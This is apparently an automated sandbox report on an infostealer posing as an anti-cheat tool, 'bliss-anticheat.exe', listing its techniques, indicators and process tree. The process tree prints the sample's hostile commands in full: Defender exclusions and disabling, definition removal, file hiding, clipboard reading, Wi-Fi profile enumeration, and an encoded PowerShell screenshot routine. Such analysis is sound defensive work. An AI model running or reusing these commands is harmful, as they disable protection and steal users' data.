cf9e1d3123926425ca2d05227cbfe854cb5fa2d9aa3cf9ee4eda5fde10ac5a93

Resubmissions

16-01-2025 13:24

250116-qnf8ratjbj 10

16-01-2025 13:23

250116-qmsv6asrgm 10

Analysis

max time kernel
19s
max time network
21s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-01-2025 13:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bliss-anticheat.exe
Size

6.7MB
MD5

cf229d85dfbcd3f6cdbdc284f11e8ce8
SHA1

d70c63884576a18c4a47d1abef81c0248c905a3b
SHA256

cf9e1d3123926425ca2d05227cbfe854cb5fa2d9aa3cf9ee4eda5fde10ac5a93
SHA512

9224bf4ae4fcd4971733f1bfd428b66583e8484db5011546008c661039d0e4181eb33293e9ba74adbefc572ad0d39b7ad2ddb34a689bc85c661cded1219bbb85
SSDEEP

196608:UTFbeN/FJMIDJf0gsAGKhiC0BRkqRjFDbv9Tr:v/Fqyf0gsEiC03kqRjtL9f

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4948	powershell.exe
4404	powershell.exe
5064	powershell.exe
4196	powershell.exe
3512	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	bliss-anticheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2556	cmd.exe
2680	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4156	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe
1172	bliss-anticheat.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
31	discord.com
32	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com
29	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2336	tasklist.exe
3200	tasklist.exe
2500	tasklist.exe
2912	tasklist.exe
4196	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1700	cmd.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023ce7-63.dat	upx
behavioral1/memory/1172-67-0x00007FFF76030000-0x00007FFF7649E000-memory.dmp	upx
behavioral1/files/0x0007000000023cb3-70.dat	upx
behavioral1/memory/1172-72-0x00007FFF898F0000-0x00007FFF89914000-memory.dmp	upx
behavioral1/files/0x0007000000023ce5-71.dat	upx
behavioral1/files/0x0007000000023cb8-126.dat	upx
behavioral1/memory/1172-127-0x00007FFF8B7C0000-0x00007FFF8B7CF000-memory.dmp	upx
behavioral1/files/0x0007000000023cb7-125.dat	upx
behavioral1/files/0x0007000000023cb6-124.dat	upx
behavioral1/files/0x0007000000023cb5-123.dat	upx
behavioral1/files/0x0007000000023cb4-122.dat	upx
behavioral1/files/0x0007000000023cb2-121.dat	upx
behavioral1/files/0x0007000000023ced-120.dat	upx
behavioral1/files/0x0007000000023ceb-119.dat	upx
behavioral1/files/0x0007000000023cea-118.dat	upx
behavioral1/files/0x0007000000023ce6-115.dat	upx
behavioral1/files/0x0007000000023ce4-114.dat	upx
behavioral1/memory/1172-132-0x00007FFF830A0000-0x00007FFF830CD000-memory.dmp	upx
behavioral1/memory/1172-133-0x00007FFF81610000-0x00007FFF81629000-memory.dmp	upx
behavioral1/memory/1172-134-0x00007FFF815F0000-0x00007FFF8160F000-memory.dmp	upx
behavioral1/memory/1172-135-0x00007FFF75CC0000-0x00007FFF75E31000-memory.dmp	upx
behavioral1/memory/1172-136-0x00007FFF81410000-0x00007FFF81429000-memory.dmp	upx
behavioral1/memory/1172-137-0x00007FFF897E0000-0x00007FFF897ED000-memory.dmp	upx
behavioral1/memory/1172-138-0x00007FFF80650000-0x00007FFF8067E000-memory.dmp	upx
behavioral1/memory/1172-140-0x00007FFF7E5B0000-0x00007FFF7E668000-memory.dmp	upx
behavioral1/memory/1172-139-0x00007FFF76030000-0x00007FFF7649E000-memory.dmp	upx
behavioral1/memory/1172-141-0x00007FFF898F0000-0x00007FFF89914000-memory.dmp	upx
behavioral1/memory/1172-142-0x00007FFF75940000-0x00007FFF75CB5000-memory.dmp	upx
behavioral1/memory/1172-145-0x00007FFF80CF0000-0x00007FFF80D04000-memory.dmp	upx
behavioral1/memory/1172-146-0x00007FFF84FE0000-0x00007FFF84FED000-memory.dmp	upx
behavioral1/memory/1172-148-0x00007FFF75660000-0x00007FFF75778000-memory.dmp	upx
behavioral1/memory/1172-147-0x00007FFF815F0000-0x00007FFF8160F000-memory.dmp	upx
behavioral1/memory/1172-144-0x00007FFF830A0000-0x00007FFF830CD000-memory.dmp	upx
behavioral1/memory/1172-171-0x00007FFF81410000-0x00007FFF81429000-memory.dmp	upx
behavioral1/memory/1172-249-0x00007FFF80650000-0x00007FFF8067E000-memory.dmp	upx
behavioral1/memory/1172-270-0x00007FFF7E5B0000-0x00007FFF7E668000-memory.dmp	upx
behavioral1/memory/1172-315-0x00007FFF75940000-0x00007FFF75CB5000-memory.dmp	upx
behavioral1/memory/1172-345-0x00007FFF815F0000-0x00007FFF8160F000-memory.dmp	upx
behavioral1/memory/1172-346-0x00007FFF75CC0000-0x00007FFF75E31000-memory.dmp	upx
behavioral1/memory/1172-340-0x00007FFF76030000-0x00007FFF7649E000-memory.dmp	upx
behavioral1/memory/1172-341-0x00007FFF898F0000-0x00007FFF89914000-memory.dmp	upx
behavioral1/memory/1172-378-0x00007FFF84FE0000-0x00007FFF84FED000-memory.dmp	upx
behavioral1/memory/1172-380-0x00007FFF76030000-0x00007FFF7649E000-memory.dmp	upx
behavioral1/memory/1172-379-0x00007FFF75660000-0x00007FFF75778000-memory.dmp	upx
behavioral1/memory/1172-390-0x00007FFF7E5B0000-0x00007FFF7E668000-memory.dmp	upx
behavioral1/memory/1172-389-0x00007FFF80650000-0x00007FFF8067E000-memory.dmp	upx
behavioral1/memory/1172-388-0x00007FFF897E0000-0x00007FFF897ED000-memory.dmp	upx
behavioral1/memory/1172-387-0x00007FFF81410000-0x00007FFF81429000-memory.dmp	upx
behavioral1/memory/1172-386-0x00007FFF75CC0000-0x00007FFF75E31000-memory.dmp	upx
behavioral1/memory/1172-385-0x00007FFF815F0000-0x00007FFF8160F000-memory.dmp	upx
behavioral1/memory/1172-384-0x00007FFF81610000-0x00007FFF81629000-memory.dmp	upx
behavioral1/memory/1172-383-0x00007FFF830A0000-0x00007FFF830CD000-memory.dmp	upx
behavioral1/memory/1172-382-0x00007FFF8B7C0000-0x00007FFF8B7CF000-memory.dmp	upx
behavioral1/memory/1172-381-0x00007FFF898F0000-0x00007FFF89914000-memory.dmp	upx
behavioral1/memory/1172-376-0x00007FFF75940000-0x00007FFF75CB5000-memory.dmp	upx
behavioral1/memory/1172-377-0x00007FFF80CF0000-0x00007FFF80D04000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1460	cmd.exe
4520	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4136	cmd.exe
2460	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3024	WMIC.exe
2332	WMIC.exe
2084	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3792	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4520	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4948	powershell.exe
4196	powershell.exe
4196	powershell.exe
4948	powershell.exe
4404	powershell.exe
4404	powershell.exe
2680	powershell.exe
2680	powershell.exe
4652	powershell.exe
4652	powershell.exe
2680	powershell.exe
4652	powershell.exe
3512	powershell.exe
3512	powershell.exe
5000	powershell.exe
5000	powershell.exe
5064	powershell.exe
5064	powershell.exe
4232	powershell.exe
4232	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4356	WMIC.exe
Token: SeSecurityPrivilege	4356	WMIC.exe
Token: SeTakeOwnershipPrivilege	4356	WMIC.exe
Token: SeLoadDriverPrivilege	4356	WMIC.exe
Token: SeSystemProfilePrivilege	4356	WMIC.exe
Token: SeSystemtimePrivilege	4356	WMIC.exe
Token: SeProfSingleProcessPrivilege	4356	WMIC.exe
Token: SeIncBasePriorityPrivilege	4356	WMIC.exe
Token: SeCreatePagefilePrivilege	4356	WMIC.exe
Token: SeBackupPrivilege	4356	WMIC.exe
Token: SeRestorePrivilege	4356	WMIC.exe
Token: SeShutdownPrivilege	4356	WMIC.exe
Token: SeDebugPrivilege	4356	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4356	WMIC.exe
Token: SeRemoteShutdownPrivilege	4356	WMIC.exe
Token: SeUndockPrivilege	4356	WMIC.exe
Token: SeManageVolumePrivilege	4356	WMIC.exe
Token: 33	4356	WMIC.exe
Token: 34	4356	WMIC.exe
Token: 35	4356	WMIC.exe
Token: 36	4356	WMIC.exe
Token: SeDebugPrivilege	3200	tasklist.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeIncreaseQuotaPrivilege	4356	WMIC.exe
Token: SeSecurityPrivilege	4356	WMIC.exe
Token: SeTakeOwnershipPrivilege	4356	WMIC.exe
Token: SeLoadDriverPrivilege	4356	WMIC.exe
Token: SeSystemProfilePrivilege	4356	WMIC.exe
Token: SeSystemtimePrivilege	4356	WMIC.exe
Token: SeProfSingleProcessPrivilege	4356	WMIC.exe
Token: SeIncBasePriorityPrivilege	4356	WMIC.exe
Token: SeCreatePagefilePrivilege	4356	WMIC.exe
Token: SeBackupPrivilege	4356	WMIC.exe
Token: SeRestorePrivilege	4356	WMIC.exe
Token: SeShutdownPrivilege	4356	WMIC.exe
Token: SeDebugPrivilege	4356	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4356	WMIC.exe
Token: SeRemoteShutdownPrivilege	4356	WMIC.exe
Token: SeUndockPrivilege	4356	WMIC.exe
Token: SeManageVolumePrivilege	4356	WMIC.exe
Token: 33	4356	WMIC.exe
Token: 34	4356	WMIC.exe
Token: 35	4356	WMIC.exe
Token: 36	4356	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2332	WMIC.exe
Token: SeSecurityPrivilege	2332	WMIC.exe
Token: SeTakeOwnershipPrivilege	2332	WMIC.exe
Token: SeLoadDriverPrivilege	2332	WMIC.exe
Token: SeSystemProfilePrivilege	2332	WMIC.exe
Token: SeSystemtimePrivilege	2332	WMIC.exe
Token: SeProfSingleProcessPrivilege	2332	WMIC.exe
Token: SeIncBasePriorityPrivilege	2332	WMIC.exe
Token: SeCreatePagefilePrivilege	2332	WMIC.exe
Token: SeBackupPrivilege	2332	WMIC.exe
Token: SeRestorePrivilege	2332	WMIC.exe
Token: SeShutdownPrivilege	2332	WMIC.exe
Token: SeDebugPrivilege	2332	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2332	WMIC.exe
Token: SeRemoteShutdownPrivilege	2332	WMIC.exe
Token: SeUndockPrivilege	2332	WMIC.exe
Token: SeManageVolumePrivilege	2332	WMIC.exe
Token: 33	2332	WMIC.exe
Token: 34	2332	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3596 wrote to memory of 1172	3596	bliss-anticheat.exe	84
PID 3596 wrote to memory of 1172	3596	bliss-anticheat.exe	84
PID 1172 wrote to memory of 5080	1172	bliss-anticheat.exe	85
PID 1172 wrote to memory of 5080	1172	bliss-anticheat.exe	85
PID 1172 wrote to memory of 428	1172	bliss-anticheat.exe	86
PID 1172 wrote to memory of 428	1172	bliss-anticheat.exe	86
PID 1172 wrote to memory of 1612	1172	bliss-anticheat.exe	89
PID 1172 wrote to memory of 1612	1172	bliss-anticheat.exe	89
PID 1172 wrote to memory of 1628	1172	bliss-anticheat.exe	91
PID 1172 wrote to memory of 1628	1172	bliss-anticheat.exe	91
PID 1612 wrote to memory of 3200	1612	cmd.exe	93
PID 1612 wrote to memory of 3200	1612	cmd.exe	93
PID 1628 wrote to memory of 4356	1628	cmd.exe	94
PID 1628 wrote to memory of 4356	1628	cmd.exe	94
PID 428 wrote to memory of 4196	428	cmd.exe	95
PID 428 wrote to memory of 4196	428	cmd.exe	95
PID 5080 wrote to memory of 4948	5080	cmd.exe	96
PID 5080 wrote to memory of 4948	5080	cmd.exe	96
PID 1172 wrote to memory of 440	1172	bliss-anticheat.exe	98
PID 1172 wrote to memory of 440	1172	bliss-anticheat.exe	98
PID 440 wrote to memory of 3192	440	cmd.exe	100
PID 440 wrote to memory of 3192	440	cmd.exe	100
PID 1172 wrote to memory of 4772	1172	bliss-anticheat.exe	101
PID 1172 wrote to memory of 4772	1172	bliss-anticheat.exe	101
PID 4772 wrote to memory of 5100	4772	cmd.exe	103
PID 4772 wrote to memory of 5100	4772	cmd.exe	103
PID 1172 wrote to memory of 964	1172	bliss-anticheat.exe	104
PID 1172 wrote to memory of 964	1172	bliss-anticheat.exe	104
PID 964 wrote to memory of 2332	964	cmd.exe	106
PID 964 wrote to memory of 2332	964	cmd.exe	106
PID 1172 wrote to memory of 4244	1172	bliss-anticheat.exe	107
PID 1172 wrote to memory of 4244	1172	bliss-anticheat.exe	107
PID 4244 wrote to memory of 2084	4244	cmd.exe	109
PID 4244 wrote to memory of 2084	4244	cmd.exe	109
PID 1172 wrote to memory of 1700	1172	bliss-anticheat.exe	110
PID 1172 wrote to memory of 1700	1172	bliss-anticheat.exe	110
PID 1172 wrote to memory of 4596	1172	bliss-anticheat.exe	112
PID 1172 wrote to memory of 4596	1172	bliss-anticheat.exe	112
PID 1700 wrote to memory of 5012	1700	cmd.exe	114
PID 1700 wrote to memory of 5012	1700	cmd.exe	114
PID 4596 wrote to memory of 4404	4596	cmd.exe	115
PID 4596 wrote to memory of 4404	4596	cmd.exe	115
PID 1172 wrote to memory of 880	1172	bliss-anticheat.exe	116
PID 1172 wrote to memory of 880	1172	bliss-anticheat.exe	116
PID 1172 wrote to memory of 4316	1172	bliss-anticheat.exe	117
PID 1172 wrote to memory of 4316	1172	bliss-anticheat.exe	117
PID 880 wrote to memory of 2500	880	cmd.exe	120
PID 880 wrote to memory of 2500	880	cmd.exe	120
PID 4316 wrote to memory of 2912	4316	cmd.exe	121
PID 4316 wrote to memory of 2912	4316	cmd.exe	121
PID 1172 wrote to memory of 2416	1172	bliss-anticheat.exe	122
PID 1172 wrote to memory of 2416	1172	bliss-anticheat.exe	122
PID 1172 wrote to memory of 2556	1172	bliss-anticheat.exe	123
PID 1172 wrote to memory of 2556	1172	bliss-anticheat.exe	123
PID 2416 wrote to memory of 1412	2416	cmd.exe	169
PID 2416 wrote to memory of 1412	2416	cmd.exe	169
PID 1172 wrote to memory of 3844	1172	bliss-anticheat.exe	127
PID 1172 wrote to memory of 3844	1172	bliss-anticheat.exe	127
PID 1172 wrote to memory of 4616	1172	bliss-anticheat.exe	129
PID 1172 wrote to memory of 4616	1172	bliss-anticheat.exe	129
PID 2556 wrote to memory of 2680	2556	cmd.exe	130
PID 2556 wrote to memory of 2680	2556	cmd.exe	130
PID 1172 wrote to memory of 4136	1172	bliss-anticheat.exe	131
PID 1172 wrote to memory of 4136	1172	bliss-anticheat.exe	131

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5012	attrib.exe
4512	attrib.exe
4784	attrib.exe

C:\Users\Admin\AppData\Local\Temp\bliss-anticheat.exe
"C:\Users\Admin\AppData\Local\Temp\bliss-anticheat.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3596
- C:\Users\Admin\AppData\Local\Temp\bliss-anticheat.exe
  "C:\Users\Admin\AppData\Local\Temp\bliss-anticheat.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bliss-anticheat.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bliss-anticheat.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1612
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:440
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4772
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4244
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\bliss-anticheat.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1700
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\bliss-anticheat.exe"
      4⤵
      Views/modifies file attributes
      PID:5012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:880
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4316
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2416
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3844
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4616
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4136
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3284
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1848
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAA